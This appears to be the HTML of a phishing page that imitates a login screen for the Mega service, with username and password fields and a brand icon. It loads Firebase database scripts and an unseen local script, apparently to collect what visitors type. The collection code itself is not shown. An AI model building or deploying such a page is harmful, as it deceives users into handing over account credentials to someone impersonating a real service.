<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Mega Login</title>
<style>
  body {
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    background-color: #f0f0f0;
  }
  .login-container {
    background-color: #fff;
    padding: 20px;
    border-radius: 5px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    width: 300px;
    text-align: center;
  }
  .login-container h2 {
    margin-bottom: 20px;
    text-align: center;
  }
  .login-container img {
    width: 80px;
    margin-bottom: 20px;
  }
  .login-container input[type="text"],
  .login-container input[type="password"] {
    width: 100%;
    padding: 10px;
    margin-bottom: 15px;
    border: 1px solid #ccc;
    border-radius: 5px;
    box-sizing: border-box;
  }
  .login-container input[type="submit"] {
    width: 100%;
    background-color: #4caf50;
    color: #fff;
    border: none;
    padding: 10px;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.3s ease;
  }
  .login-container input[type="submit"]:hover {
    background-color: #45a049;
  }
</style>
</head>
<body>
<div class="login-container">
  <img src="4920706.png" alt="Mega Icon">
  <h2>Login to Mega </h2>
  <form action="#" method="post">
    <input id='username' type="text"  name="username" placeholder="Username" required>
    <input id='password'  type="password" name="password" placeholder="Password" required>
    <input id='btnSubmit' type="submit" value="Login">
  </form>
</div>
</body>
<script src="https://www.gstatic.com/firebasejs/8.3.1/firebase-app.js"></script>
  <script src="https://www.gstatic.com/firebasejs/8.3.1/firebase-database.js"></script>
  <script src="a.js"></script>
</html>
